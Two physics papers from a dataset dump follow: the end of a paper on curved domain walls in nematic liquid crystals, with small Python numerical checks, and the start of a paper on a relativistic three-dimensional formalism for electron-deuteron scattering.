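As noted above, the integral in $\psi_3(s)$ is easy to evaluate numerically. The sketch below is our own illustrative aside: it evaluates that integral by Simpson's rule and also checks, by finite differences, that $\psi_3$ solves the inhomogeneous equation $\hat{L}\psi_3 = s\,\partial_s\Theta_0 = s/\cosh s$, which is our reading of what formulas (19) and (22) imply for the coefficient of $K^i_jK^j_i$:

```python
import math

# I(s) = int_0^s x^2 / cosh^2 x dx by Simpson's rule, and a
# finite-difference check that psi_3 solves L psi_3 = s / cosh s.
def I(s, n=4000):
    if s == 0.0:
        return 0.0
    h = s / n
    f = lambda x: x*x / math.cosh(x)**2
    acc = f(0.0) + f(s)
    for k in range(1, n):
        acc += (4.0 if k % 2 else 2.0) * f(k*h)
    return acc * h / 3.0

def psi1(s):
    return 0.5 * (math.sinh(s) + s / math.cosh(s))

def psi3(s):
    c = math.cosh(s)
    return (0.5*s*c - 0.5*s/c - psi1(s)*math.log(2.0*c)
            + 0.25*s*s*math.sinh(s)/c**2 - 0.25*I(s)/c)

def residual(s, h=1e-4):
    d2 = (psi3(s + h) - 2.0*psi3(s) + psi3(s - h)) / h**2
    return d2 + (2.0/math.cosh(s)**2 - 1.0)*psi3(s) - s/math.cosh(s)

I_inf = I(30.0)      # saturates at pi^2/12 as s -> infinity
max_res = max(abs(residual(0.2*k)) for k in range(-10, 11) if k != 0)
```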
The consistency condition (26) with $k=2$ does not give any restrictions ---
it can be reduced to the identity $0 = 0$. More interesting is the next
condition, that is the one with $k=3$. Inserting formula (23) for $f_3$ and
calculating necessary integrals over $s$ we find that it can be written in
the form of the following inhomogeneous equation for $C_1(\sigma^i,t)$
\begin{eqnarray}
& \frac{\gamma_1}{K} ( \partial_t C_1 - g^{kr} \vec{X}_{,r}\dot{\vec{X}}
\partial_k C_1 ) - \frac{1}{\sqrt{g}}\partial_j(\sqrt{g} g^{jk}\partial_kC_1)
- K^i_j K^j_i C_1 & \nonumber \\
& = \frac{\pi^2}{24} K^r_r\left((K^i_i)^2 - 3 K^i_jK^j_i\right). &
\end{eqnarray}
We have also used the Allen-Cahn equation (30). Equation (33) determines $C_1$
provided that we fix initial data for it. Similarly, the consistency
condition coming from the fourth order ($k=4$) is
equivalent to the following homogeneous equation for $C_2$
\begin{eqnarray}
& \frac{\gamma_1}{K} ( \partial_t C_2 - g^{kr} \vec{X}_{,r}\dot{\vec{X}}
\partial_k C_2 ) & \nonumber \\
& - \frac{1}{\sqrt{g}} \partial_j(\sqrt{g} g^{jk}\partial_kC_2)
- K^i_j K^j_i C_2 = 0. &
\end{eqnarray}
The formulas (16), (18), (31) and (32) give a whole family of domain
walls. To obtain one concrete domain wall solution we have to choose the
initial position of the auxiliary surface $S$. Its positions at later times
are determined from the Allen-Cahn equation (30). We also have to fix initial
values of the functions $C_1, C_2$, and to find the corresponding solutions
of Eqs.(33), (34). Notice that we are not allowed to choose the
initial profile of the domain wall because the dependence
on the transverse coordinate $s$ is explicitly given. It is known from
formulas (18), (31) and (32).
Any choice of the initial data gives an approximate domain wall solution.
Of course such a choice should not lead to large perturbative corrections,
at least in a certain finite time interval. Therefore one should require that
at the initial time $\xi_m C_1 \ll 1 , \xi_m^2 C_2 \ll 1, \xi_m K^i_j \ll 1$.
The domain wall is located close to the surface $S$ because for large
$|s|$ the perturbative contributions vanish and the leading term
$2\arctan(e^s)$ is close to one of the vacuum values $0, \pi$.
Let us remark that Eqs.(30), (33) and (34) imply that a planar
domain wall ($K^i_j = 0$) cannot move, in contrast to
relativistic domain walls, for which uniform inertial motion is possible.
In the presented approach we describe the evolution of the domain wall in
terms of the surface $S$ and of the functions $C_1, C_2$. These functions can
be regarded as fields defined on $S$. In some cases Eqs.(30), (33), (34) can
be solved analytically; one can also use numerical methods. In any case, these
equations are much simpler than the initial Eq.(5).
The presented formalism is invariant with respect to changes of coordinates
$\sigma^1, \sigma^2$ on $S$. In particular, in a vicinity of any point
$\vec{X}$ of $S$ we can choose the coordinates in such a way that
$g_{ik} =\delta_{ik}$ at $\vec{X}$. In these coordinates Eq.(30) has the
form
\begin{equation}
\frac{\gamma_1}{K} v = \frac{1}{R_1} + \frac{1}{R_2},
\end{equation}
where $v$ is the velocity in the direction $\vec{p}$ perpendicular to $S$
at the point $\vec{X}$, and $R_1, R_2$ are the principal curvature radii of
$S$ at that point.
As an example, let us consider cylindrical and spherical domain walls.
If $S$ is a straight cylinder of radius $R$ then $R_1 = \infty,
\;R_2 = - R(t)$, $v=\dot{R}$ and Eq.(35) gives
\begin{equation}
R(t) = \sqrt{R^2_0 - \frac{2K}{\gamma_1}(t-t_0)},
\end{equation}
where $R_0$ is the initial radius.
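Formula (36) can be confirmed by integrating Eq.(35) numerically; the sketch below (an illustrative aside, with a hypothetical value of $K/\gamma_1$) compares a Runge-Kutta solution of $(\gamma_1/K)\dot{R} = -1/R$ with the closed form:

```python
import math

# Illustrative RK4 check that R(t) = sqrt(R_0^2 - 2(K/gamma_1)(t - t_0))
# solves (gamma_1/K) dR/dt = -1/R, i.e. Eq.(35) for the cylinder.
a = 0.5                       # hypothetical value of K/gamma_1
R0, t0 = 2.0, 0.0

def rhs(R):
    return -a / R

def rk4(R, dt, steps):
    for _ in range(steps):
        k1 = rhs(R)
        k2 = rhs(R + 0.5*dt*k1)
        k3 = rhs(R + 0.5*dt*k2)
        k4 = rhs(R + dt*k3)
        R += dt * (k1 + 2*k2 + 2*k3 + k4) / 6.0
    return R

t = 2.0                       # well before the collapse time R0^2/(2a) = 4
R_num = rk4(R0, 1e-3, int((t - t0) / 1e-3))
R_exact = math.sqrt(R0*R0 - 2.0*a*(t - t0))
```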
The origin of the Cartesian coordinate frame is located on the symmetry axis
of the cylinder $S$ (the $z$-axis), $\vec{p}$ is the outward normal to
$S$, and $s = (\sqrt{r^2-z^2}-R(t))/\xi_m$, where $r$ is the spherical radial
coordinate in $R^3$, so that $\sqrt{r^2-z^2}$ is the distance from the axis.
As $\sigma^1, \sigma^2$ we take the usual cylindrical
coordinates $z, \phi$. Equations (33), (34) reduce to
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_1 - \left( \partial^2_z C_1 +\frac{1}{R^2}
\partial^2_{\phi}C_1\right)
- \frac{1}{R^2} C_1 = \frac{\pi^2}{12} \frac{1}{R^3},
\end{equation}
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_2 - \left( \partial^2_z C_2 +\frac{1}{R^2}
\partial^2_{\phi}C_2\right) - \frac{1}{R^2} C_2 = 0.
\end{equation}
If $C_1, C_2$ at the initial time $t_0$ have just constant values
$C_1(0), C_2(0)$ on the cylinder, then
\begin{equation}
C_1(t) = \frac{\pi^2}{12 R(t)} \ln(R_0/R(t)) + \frac{R_0}{R(t)} C_1(0), \;\;
C_2(t) = \frac{R_0}{R(t)} C_2(0).
\end{equation}
General solutions of Eqs.(37), (38) can be
found by splitting $C_1, C_2$ into Fourier modes, but we shall not present
them here.
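Formula (39) can likewise be checked against a direct numerical integration of Eq.(37) for data constant on the cylinder, so that the $z$ and $\phi$ derivatives drop out. The sketch below is an illustrative aside with hypothetical parameter values:

```python
import math

# Illustrative RK4 check of formula (39) for C_1(t) on a shrinking
# cylinder with constant initial data: (gamma_1/K) dC_1/dt
# = C_1/R^2 + pi^2/(12 R^3), with R(t) given by formula (36).
a = 0.5                       # hypothetical value of K/gamma_1
R0, C10 = 2.0, 0.3            # hypothetical initial radius and C_1(0)

def R(t):
    return math.sqrt(R0*R0 - 2.0*a*t)

def rhs(t, C):
    r = R(t)
    return a * (C / r**2 + math.pi**2 / (12.0 * r**3))

def rk4(C, t, dt, steps):
    for _ in range(steps):
        k1 = rhs(t, C)
        k2 = rhs(t + 0.5*dt, C + 0.5*dt*k1)
        k3 = rhs(t + 0.5*dt, C + 0.5*dt*k2)
        k4 = rhs(t + dt, C + dt*k3)
        C += dt * (k1 + 2*k2 + 2*k3 + k4) / 6.0
        t += dt
    return C

t1 = 2.0
C_num = rk4(C10, 0.0, 1e-4, int(t1 / 1e-4))
r1 = R(t1)
C_exact = math.pi**2/(12.0*r1) * math.log(R0/r1) + (R0/r1)*C10
```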
The case of spherical domain wall is quite similar. Now $S$ is a sphere of
radius $R$ and $R_1=R_2 = - R$, $ v = \dot{R}$. Equation (35) gives
\begin{equation}
R(t) = \sqrt{R^2_0 - \frac{4K}{\gamma_1}(t-t_0)}.
\end{equation}
Now the origin is located at the center of the sphere,
$s = (r - R(t))/\xi_m$,
and $\vec{p}$ is the outward normal to $S$. As $\sigma^k$ we take the usual
spherical coordinates. Then, Eqs.(33), (34) can be written in the form
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_1 - \frac{1}{R^2}\left(\frac{1}{\sin\theta}
\partial_{\theta}(\sin\theta \partial_{\theta}C_1) + \frac{1}{\sin^2\theta}
\partial^2_{\phi}C_1 \right) - \frac{2}{R^2}C_1 = \frac{\pi^2}{6}
\frac{1}{R^3},
\end{equation}
and
\begin{equation}
\frac{\gamma_1}{K} \partial_t C_2 - \frac{1}{R^2}\left(\frac{1}{\sin\theta}
\partial_{\theta}(\sin\theta \partial_{\theta}C_2) + \frac{1}{\sin^2\theta}
\partial^2_{\phi}C_2 \right) - \frac{2}{R^2}C_2 = 0.
\end{equation}
The general solution of these equations can be obtained by expanding $C_1,
C_2$ in spherical harmonics. In the particular case when $C_1, C_2$ are constant
on the sphere $S$ the solutions $C_k(t)$ have the same form (39) as in the
previous case except that now $R(t)$ is given by formula (40).
In both cases our approximate formulas are expected to be meaningful
as long as $R(t)/\xi_m \gg 1$.
Because we know the transverse profile of the domain wall, we can express
the total free energy $F$ in terms of geometric characteristics of the domain
wall. One should insert our
approximate solution for $\Theta$ in formulas (2) and (3) for ${\cal F}_e$
and ${\cal F}_m$, respectively, and perform the integration over $s$. The
volume element $d^3x$ is taken in the form
\[
d^3x = \xi_m \sqrt{G} d^2\sigma ds.
\]
For simplicity, let us consider curved domain walls for which
\[
C_1= 0 = C_2
\]
at the time $t_0$. Straightforward calculation gives
\[
F = - \frac{K}{2}\frac{V}{\xi_m^2} + \frac{2K}{\xi_m} |S| \;\;\;\;\;\;\;\;\;
\]
\begin{equation}
- \frac{\pi^2}{6} K \xi_m \int d^2\sigma \sqrt{g} (\frac{1}{R_1^2}
+\frac{1}{R_2^2} - \frac{1}{R_1R_2}) + \mbox{terms of the order}\;\xi_m^3,
\end{equation}
where $|S|$ denotes the area of the surface $S$, and $V$ is the total volume
of the liquid crystalline sample. The first term on the
r.h.s. of this formula is just a bulk term which appears because the smallest
value of the magnetic free energy density has been chosen to be equal to
$-K/(2\xi_m^2)$. The proper domain wall contribution starts from the second
term, which gives the main contribution of the domain wall to $F$: one can
think of it as a constant free energy $2K/\xi_m$ per unit area.
The third term on the r.h.s. of formula (43) represents
the first perturbative correction. It is of the order $(\xi_m/R_i)^2$ when
compared with the main term, and within the region of validity of our
perturbative scheme it is small. This term is negative or zero because
\[
\frac{1}{R_1^2} + \frac{1}{R_2^2} - \frac{1}{R_1R_2} =
\left(\frac{1}{R_1} - \frac{1}{2R_2}\right)^2 + \frac{3}{4R_2^2} \geq 0.
\]
Hence, it slightly diminishes the total free energy.
In this sense, the domain walls have negative rigidity --- bending them
without stretching (i.e., with $|S|$ kept constant) diminishes the free
energy.
\section{Remarks}
We would like to add several remarks about the expansion in width
and the approximate domain wall solutions it yields.
\noindent 1. In the presented approach the dynamics of the curved domain wall
in three-dimensional space is described in terms of the comoving surface
$S$ and of the functions $C_k$, $k \geq 1$, defined on $S$. The profile of
the domain wall has been explicitly expressed by these functions, by
the transverse coordinate $\xi$, and by the geometric characteristics of $S$.
The surface $S$ and the functions $C_k$ obey equations (30), (33), (34) which
do not contain $\xi$. In particular cases these equations can be solved
analytically, and in general one can look for numerical solutions. Such
numerical analysis is much simpler than it would be in the case of the
initial equation (5) for the angle $\Theta$, precisely because one
independent variable has been eliminated.
\noindent 2. We have used $\xi_m$ as a formal expansion parameter. This may
seem unsatisfactory because it is a
dimensionful quantity, so it is hard to say whether its value is small
or large. What really matters is the smallness of the corrections
$\xi_m \Theta_1,\; \xi_m^2 \Theta_2$. This is the case if
$\xi_m C_1 \ll 1, \; \xi_m^2 C_2 \ll 1$ and $\xi_m K^i_j \ll 1$, as it follows
from formulas (31) and (32).
\noindent 3. Notice that the assumption that $S$ coincides with the core
for all times would in general not be compatible with the expansion in width.
If we assume that $C_1 = 0 = C_2$ at a certain initial time $t_0$, Eq.(33)
implies that $C_1 \neq 0$ at later times (unless its r.h.s. happens to
vanish).
Then, it follows from formulas (16), (18) and (31) that $\Theta \neq \pi/2$
at $s=0$, that is on $S$.
\noindent 4. In the present work we have neglected effects which could come
from perturbations of the exponentially small tails of the domain wall.
For example, consider a domain wall in the form of infinite
straight cylinder flattened from two opposite sides. Its front and rear flat
sides have zero curvatures, and according to Eq.(35) they do not move.
In our approximations the domain wall shrinks from the sides where the mean
curvature $1/R_1 + 1/R_2$ does not vanish. Now, in reality the front and
rear parts interact with each other. This interaction is exponentially small
only if the two flat parts are far from each other. We have neglected it
altogether assuming the $2\arctan(e^s)$ asymptotics at large $s$. In this
sense, our approximate solution takes into account only the effects of
curvature.
\noindent 5. Finally, let us mention that the dynamics of domain walls in
nematic liquid crystals can also be investigated with the help of another
approximation scheme, called the polynomial approximation. In the first of
the papers \cite{11} it was applied to a cylindrical domain wall, and in the
second to a planar soliton. Comparing the two approaches, the
polynomial approximation is much cruder than the expansion in width.
It also contains more arbitrariness, e.g., in choosing the concrete form of
the boundary conditions at $|s| \rightarrow \infty$. On the other hand, that
method is much simpler and can be useful for rough estimates.
| 2024-02-18T23:40:13.449Z | 1998-11-30T13:09:45.000Z | algebraic_stack_train_0000 | 1,726 | 6,227 |
|
proofpile-arXiv_065-8463 | \section{Introduction}
A number of the experiments being performed at the Thomas Jefferson
National Accelerator Facility (TJNAF) involve the elastic and
inelastic scattering of electrons off the deuteron at space-like
momentum transfers of the order of the nucleon mass. In building
theoretical models of these processes, relativistic kinematics and
dynamics would seem to be called for. Much theoretical effort has
been spent constructing relativistic formalisms for the two-nucleon
bound state that are based on an effective quantum field theory
lagrangian. If the usual hadronic degrees of freedom appear in the
lagrangian then this strategy is essentially a logical extension of
the standard nonrelativistic treatment of the two-nucleon system.
Furthermore, regardless of the momentum transfer involved, it is
crucial that a description of the deuteron be used which incorporates
the consequences of electromagnetic gauge invariance. Minimally this
means that the electromagnetic current constructed for the deuteron
must be conserved.
Of course, the two-nucleon bound state can be calculated and a
corresponding conserved deuteron current constructed using
non-relativistic $NN$ potentials which are fit to the $NN$ scattering
data. This approach has met with considerable success. (For some
examples of this program see Refs.~\cite{Ad93,Wi95}.) Our goal here is
to imitate such calculations---and, we hope, their success!---in a
relativistic framework. To do this we construct an $NN$ interaction,
place it in a relativistic scattering equation, and then fit the
parameters of our interaction to the $NN$ scattering data. We then
calculate the electromagnetic form factors of the deuteron predicted
by this $NN$ model. By proceeding in this way we hope to gain
understanding of the deuteron electromagnetic form factors in a model
in which relativistic effects, such as relativistic kinematics,
negative-energy states, boost effects, and relativistic pieces of the
electromagnetic current, are explicitly included at all stages of the
calculation.
This program could be pursued using a four-dimensional formalism based
on the Bethe-Salpeter equation. Indeed, pioneering calculations of
electron-deuteron scattering using Bethe-Salpeter amplitudes were
performed by Zuilhof and Tjon almost twenty years
ago~\cite{ZT80,ZT81}. However, despite increases in computer power
since this early work the four-dimensional problem is still a
difficult one to solve. Since the $NN$ interaction is somewhat
phenomenological ultimately it is not clear that one gains greatly in
either dynamics or understanding by treating the problem
four-dimensionally. Therefore, instead we will employ a
three-dimensional formalism that incorporates what we believe are the
important dynamical effects due to relativity at the momentum
transfers of interest.
We will use a three-dimensional (3D) formalism that, in principle, is
equivalent to the four-dimensional Bethe-Salpeter formalism. This
approach has been developed and applied in
Refs.~\cite{PW96,PW97,PW98}. In this paper we will focus on the
calculation of elastic electron-deuteron scattering. Here we review
the formalism for relativistic bound states and show how to construct
the corresponding electromagnetic current. Calculations of elastic
electron-deuteron scattering are performed both in the impulse
approximation and with some meson-exchange currents included. The
results for the observables $A$, $B$ and $T_{20}$ are presented.
Many other 3D relativistic treatments of the deuteron dynamics that
are similar in spirit to the one pursued here exist (see for instance
Refs.~\cite{vO95,Ar80}). Of these, our work is closest to that of
Hummel and Tjon~\cite{HT89,HT90,HT94}. However, in that work
approximations were employed for ingredients of the analysis, such as
the use of wave functions based on the 3D quasipotential propagator of
Blankenbecler-Sugar~\cite{BbS66} and Logunov-Tavkhelidze~\cite{LT63},
approximate boost operators, and an electromagnetic current which only
approximately satisfies current conservation. Calculations of elastic
electron-deuteron scattering also were performed by Devine and Wallace
using a similar approach to that pursued here~\cite{WD94}. Here we
extend these previous analyses by use of our systematic 3D formalism.
In this way we can incorporate retardations into the interaction and
also use a deuteron electromagnetic current that is specifically
constructed to maintain the Ward-Takahashi identities.
The paper is organized as follows. In Section~\ref{sec-Section2} we
explain our reduction from four to three dimensions. In
Section~\ref{sec-Section3} we present a four-dimensional equation
which is a modified version of the ladder Bethe-Salpeter equation.
This modified equation has the virtue that it, unlike the ladder BSE,
incorporates the correct one-body limit. By applying our
three-dimensional reduction technique to this four-dimensional
equation we produce an equation which has the correct one-body limit and
contains the correct physics of negative-energy states. In
Section~\ref{sec-Section4} we explain the various potentials that are
used in calculations of deuteron wave functions. These can be divided
into two classes: instant potentials, and potentials that include
meson retardation. Within either of these classes versions of the
potentials are constructed that do and do not include the effects of
negative-energy states, in order to display the role played by such
components of the deuteron wave function. Section~\ref{sec-Section5}
discusses our 3D reduction of the electromagnetic current that
maintains current conservation. This completes the laying out of a
consistent formalism that includes the effects of relativity
systematically, has the correct one-body limits, and maintains current
conservation. In Section~\ref{sec-Section6} we apply this machinery to
the calculation of electron-deuteron scattering both in the impulse
approximation and when corrections due to some meson-exchange currents
are included. Finally, discussion and conclusions are presented in
Section~\ref{sec-Section7}.
\section{The reduction to three dimensions}
\label{sec-Section2}
The Bethe-Salpeter equation,
\begin{equation}
T=K + K G_0 T,
\label{eq:BSE}
\end{equation}
for the four-dimensional $NN$ amplitude $T$ provides a theoretical
description of the deuteron which incorporates relativity.
Here $K$ is the Bethe-Salpeter kernel, and $G_0$ is the
free two-nucleon propagator. In a strict quantum-field-theory
treatment, the kernel $K$ includes the infinite set of two-particle
irreducible $NN \rightarrow NN$ Feynman graphs.
For the two-nucleon system an application of the full effective
quantum field theory of nucleons and mesons is impractical and
perhaps, since hadronic degrees of freedom are not fundamental,
inappropriate. In other words, the Bethe-Salpeter formalism may serve
as a theoretical framework within which some relativistic effective
interaction may be developed. But, if the $NN$ interaction is only an
effective one, then it would seem to be equally appropriate to develop
the relativistic effective interaction within an equivalent
three-dimensional formalism which is obtained from the
four-dimensional Bethe-Salpeter formalism via some systematic
reduction technique.
One straightforward way to reduce the Bethe-Salpeter equation to three
dimensions is to approximate the kernel $K$ by an instantaneous
interaction $K_{\rm inst}$. For example, if $q=(q_0,{\bf q})$ is the
relative four-momentum of the two nucleons then
\begin{equation}
K(q)=\frac{1}{q^2 - \mu^2} \qquad \rightarrow \qquad
K({\bf q})=-\frac{1}{{\bf q}^2 + \mu^2}.
\end{equation}
This admittedly uncontrolled approximation yields, from the Bethe-Salpeter
equation, the Salpeter equation:
\begin{equation}
T_{\rm inst}=K_{\rm inst} + K_{\rm inst} \langle G_0 \rangle T_{\rm inst},
\label{eq:Salpeter}
\end{equation}
where the three-dimensional Salpeter propagator $\langle G_0 \rangle$ is
obtained by integrating over the time-component of relative momentum,
\begin{equation}
\langle G_0 \rangle=\int \frac{dp_0}{2 \pi} G_0(p;P).
\end{equation}
Throughout this paper we denote the integration over the zeroth
component of relative momenta, which is equivalent to consideration of
an equal-time Green's function, by angled brackets. We shall consider
only spin-half particles, and so
\begin{equation}
\langle G_0 \rangle=\frac{\Lambda_1^+ \Lambda_2^+}{E - \epsilon_1
- \epsilon_2} - \frac{\Lambda_1^- \Lambda_2^-}{E + \epsilon_1
+ \epsilon_2};
\label{eq:aveG0}
\end{equation}
where $\Lambda^{\pm}$ are related to projection operators onto
positive and negative-energy states of the Dirac equation, $E$ is the
total energy, and $\epsilon_i=({\bf p}_i^2 + m_i^2)^{1/2}$. Note that
for spin-half particles, this propagator $\langle G_0 \rangle$ is not
invertible.
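To illustrate the angled-bracket operation in the simplest setting, consider two spinless particles (a simplification relative to the spin-half case above). With Feynman propagators $i/(p_i^2 - m_i^2 + i\epsilon)$, closing the $p_0$ contour gives $\langle G_0 \rangle = \frac{i}{4\epsilon_1\epsilon_2}\left[\frac{1}{E - \epsilon_1 - \epsilon_2} - \frac{1}{E + \epsilon_1 + \epsilon_2}\right]$. The sketch below is our own illustrative check of this, with hypothetical kinematics: below threshold ($E < \epsilon_1 + \epsilon_2$) the $p_0$ integral can be rotated to the imaginary axis, where the integrand is smooth, and evaluated by Simpson's rule.

```python
import math

# Numerical check (illustrative) of the p0 integral of two spinless
# Feynman propagators against the closed contour-integration result.
def avg_G0_numeric(E, e1, e2, Y=60.0, n=6000):
    def f(p0):
        d1 = (0.5*E + p0)**2 - e1*e1
        d2 = (0.5*E - p0)**2 - e2*e2
        return (1j/d1) * (1j/d2)
    # Wick-rotated integral: int dp0 -> i * int dy with p0 = i y,
    # valid below threshold since no poles are crossed.
    h = 2.0*Y/n
    acc = f(-1j*Y) + f(1j*Y)
    for k in range(1, n):
        acc += (4.0 if k % 2 else 2.0) * f(1j*(-Y + k*h))   # Simpson weights
    return 1j * (acc * h/3.0) / (2.0*math.pi)

def avg_G0_exact(E, e1, e2):
    return 1j/(4.0*e1*e2) * (1.0/(E - e1 - e2) - 1.0/(E + e1 + e2))

E, e1, e2 = 1.5, 1.0, 1.1      # hypothetical below-threshold kinematics
num = avg_G0_numeric(E, e1, e2)
exact = avg_G0_exact(E, e1, e2)
```

For spin-half particles the same $p_0$ integration produces, in addition, the $\Lambda^\pm$ projector structure shown in Eq.~(\ref{eq:aveG0}).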
In order to systematize this kind of 3D reduction one must split the
4D kernel $K$ into two parts. One of these, $K_1$, is to be understood
as a three-dimensional interaction in the sense that it does not
depend on the zeroth component of relative four momentum~\footnote {Of
course, this is not a covariant reduction, but covariance can be
maintained by a suitable generalization of this idea~\cite{PW97}.}.
We then seek to choose this $K_1$ such that the 3D amplitude $T_1$
defined by
\begin{equation}
T_1=K_1 + K_1 \langle G_0 \rangle T_1,
\label{eq:3Dscatt}
\end{equation}
has the property that
\begin{equation}
\langle G_0 \rangle T_1 \langle G_0 \rangle=\langle G_0 T G_0 \rangle.
\end{equation}
It is straightforward to demonstrate that such a $K_1$ is defined by
the coupled equations:
\begin{equation}
K_1 = \langle G_0 \rangle ^{-1} \langle G_0 K {\cal G} \rangle
\langle G_0 \rangle ^{-1} ,
\label{eq:K1}
\end{equation}
which is three-dimensional, and
\begin{equation}
{\cal G} = G_0 + G_0 (K - K_1) {\cal G},
\label{eq:<G0>}
\end{equation}
which is four dimensional. The $K_1$ of Eq.~(\ref{eq:K1}) does this by
ensuring that
\begin{equation}
\langle {\cal G} \rangle=\langle G_0 \rangle.
\label{eq:calGeq}
\end{equation}
The formalism is systematic in the sense that, given a perturbative
expansion for the 4D kernel, $K$, a perturbative expansion for the 3D
kernel, $K_1$, can be developed. At second order in the coupling this gives:
\begin{equation}
K_1^{(2)}=\langle G_0 \rangle^{-1} \langle G_0 K^{(2)} G_0 \rangle
\langle G_0 \rangle^{-1}.
\label{eq:K12}
\end{equation}
In $++ \rightarrow ++$ states this is just the usual energy-dependent
one-particle-exchange interaction of time-ordered perturbation theory,
but with relativistic kinematics. Ignoring spin and isospin, it reads:
\begin{equation}
K_1^{(2)}=\frac{g^2}{2 \omega}\left[\frac{1}{E^+ - \epsilon_1 -
\epsilon_2' - \omega} + (1 \leftrightarrow 2)\right],
\end{equation}
where $\omega$ is the on-shell energy of the exchanged particle. Note
that $\langle G_0 \rangle$ must be invertible in order for the 3D
reduction to be consistent. (Similar connections between three and
four-dimensional approaches are discussed in
Refs.~\cite{LT63,Kl53,KL74,BK93B,LA97}.)
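A sketch of this retarded kernel, together with the check that it collapses to the static Yukawa form $-g^2/({\bf q}^2+\mu^2)$ at the on-shell elastic point, where both time-ordered denominators reduce to $-\omega$ (the $+i\epsilon$ prescription is dropped, and all couplings and kinematics are illustrative):

```python
import math

def eps(m, p2):
    """Relativistic single-particle energy sqrt(m^2 + |p|^2)."""
    return math.sqrt(m * m + p2)

def K1_2nd(g2, E, e1, e2p, e1p, e2, omega):
    """Second-order retarded (time-ordered) one-particle-exchange kernel,
    ignoring spin and isospin: g^2/(2w) [1/(E - e1 - e2' - w) + (1 <-> 2)]."""
    return g2 / (2.0 * omega) * (1.0 / (E - e1 - e2p - omega)
                                 + 1.0 / (E - e1p - e2 - omega))

# Illustrative numbers (GeV units), elastic kinematics |p'| = |p|.
M, mu, g2 = 0.939, 0.138, 14.0
p2, q2 = 0.04, 0.02                 # |p|^2 and momentum transfer |q|^2
e1 = e1p = e2 = e2p = eps(M, p2)
E = e1 + e2                          # on-shell total energy
w = eps(mu, q2)                      # on-shell energy of the exchanged meson

K_ret = K1_2nd(g2, E, e1, e2p, e1p, e2, w)
K_static = -g2 / (q2 + mu * mu)      # instantaneous Yukawa kernel
assert math.isclose(K_ret, K_static)
```

Away from the on-shell point the two expressions differ, which is precisely the retardation effect studied in Section 4.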
Equation~(\ref{eq:3Dscatt}) leads to an equation for the bound-state
vertex function:
\begin{equation}
\Gamma_1 = K_1 \langle G_0 \rangle \Gamma_1,
\label{eq:3Deqn}
\end{equation}
where $\Gamma_1$ is the vertex function in the three-dimensional
theory. The 4D vertex function, $\Gamma$, and the
corresponding 3D one, $\Gamma_1$, are related via
\begin{equation}
G_0 \Gamma = {\cal G}\Gamma_1.
\label{eq:GcalGamma1}
\end{equation}
\section{The one-body limit}
\label{sec-Section3}
As mentioned above, and discussed many years ago by Klein~\cite{Kl53},
the propagator $\langle G_0 \rangle$ is not invertible and therefore
the above reduction is not consistent. We shall show in this section
that this difficulty is connected to the behavior of the
three-dimensional equation in the one-body limit. In this limit we
allow one particle's mass to tend to infinity. We expect that the
amplitude $T_1$ then reduces to that given by the Dirac equation for a
light particle moving in the static field of the heavy particle. In
fact, this does not happen unless we include an infinite number of
graphs in the kernel of the integral equation Eq.~(\ref{eq:Salpeter}).
Indeed, if a scattering equation whose kernel contains only a
finite number of graphs is to possess the correct one-body limit, two
distinct criteria must be satisfied. First the 3D propagator should
limit to the one-body propagator for one particle (the Dirac
propagator in this case) as the other particle's mass tends to
infinity. Second, as either particle's mass tends to infinity, the
equation should become equivalent to one in which the interaction,
$K_1$, is static.
Equation~(\ref{eq:Salpeter}) possesses neither of these properties,
because Eq.~(\ref{eq:BSE}) does not have the correct one-body limit if
any kernel which does not include the infinite set of crossed-ladder
graphs is chosen~\cite{Gr82}. Solution of Eq.~(\ref{eq:BSE}) with such
a kernel is impractical in the $NN$ system. Nevertheless, the
contributions of crossed-ladder graphs to the kernel may be included
in an integral equation for $T$ by using a 4D integral equation for
$K$, the kernel of Eq.~(\ref{eq:BSE}):
\begin{equation}
K = U + U G_C K.
\label{eq:U}
\end{equation}
Once $G_C$ is defined this equation defines a reduced kernel $U$ in
terms of the original kernel $K$. The propagator $G_C$ is chosen so
as to separate the parts of the kernel $K$ that are necessary to
obtain the one-body limit from the parts that are not. $U$ may then
be truncated at any desired order without losing the one-body limits.
The following 4D equation for the t-matrix is thus equivalent to
Eqs.~(\ref{eq:BSE}) and (\ref{eq:U}),
\begin{equation}
T = U + U (G_0 + G_C) T.
\label{eq:4DETampl}
\end{equation}
We can now remedy the defects of our previous 3D reduction. Applying
the same 3D reduction used above to Eq.~(\ref{eq:4DETampl}) gives:
\begin{equation}
T_1 = U_1 + U_1 \langle G_0 + G_C \rangle T_1,
\label{eq:3DETampl}
\end{equation}
where the 3D propagator is
\begin{eqnarray}
\langle G_0 + G_C \rangle&=&\frac{ \Lambda_1^+ \Lambda_2^+}{{P^0}^+
- \epsilon_1 - \epsilon_2} - \frac{ \Lambda_1^+ \Lambda_2^-}{2
\kappa_2^0 - {P^0}^+ + \epsilon_1 + \epsilon_2} \nonumber\\
&-& \frac{ \Lambda_1^- \Lambda_2^+}{{P^0}^- - 2 \kappa_2^0 + \epsilon_1
+ \epsilon_2} - \frac{ \Lambda_1^- \Lambda_2^-}{{P^0}^- +
\epsilon_1 + \epsilon_2},
\label{eq:aveG0GCgeneral}
\end{eqnarray}
and $\kappa_2^0$ is a parameter that enters through the construction
of $G_C$. This three-dimensional propagator was derived by Mandelzweig
and Wallace with the choice $\kappa_2^0 = P^0/2 - (m_1^2 -
m_2^2)/(2P^0)$~\cite{MW87,WM89}. With $\kappa_2^0$ chosen in this way
$\langle G_0 + G_C \rangle$ has the correct one-body limits as either
particle's mass tends to infinity and has an invertible form. The
kernel $U_1$ is defined by Eqs.~(\ref{eq:K1}) and (\ref{eq:calGeq})
with the replacements $G_0 \rightarrow G_0 + G_C$, $K \rightarrow U$,
and $K_1 \rightarrow U_1$.
Here we are interested in the scattering of particles of equal mass
and so we make a different choice for $\kappa_2^0$. Specifically,
\begin{equation}
\kappa_2^0 = \frac{P^0 - \epsilon_1 + \epsilon_2}{2}.
\label{eq:kappachoice}
\end{equation}
This form avoids the appearance of unphysical singularities when
electron-deuteron scattering is calculated~\cite{PW98}. It yields a
two-body propagator:
\begin{equation}
\langle G_0 + G_C \rangle=\frac{ \Lambda_1^+ \Lambda_2^+}{{P^0}^+
- \epsilon_1 - \epsilon_2} - \frac{ \Lambda_1^+ \Lambda_2^-}{2
\epsilon_2} - \frac{ \Lambda_1^- \Lambda_2^+}{2 \epsilon_1} -
\frac{ \Lambda_1^- \Lambda_2^-}{{P^0}^- + \epsilon_1 + \epsilon_2},
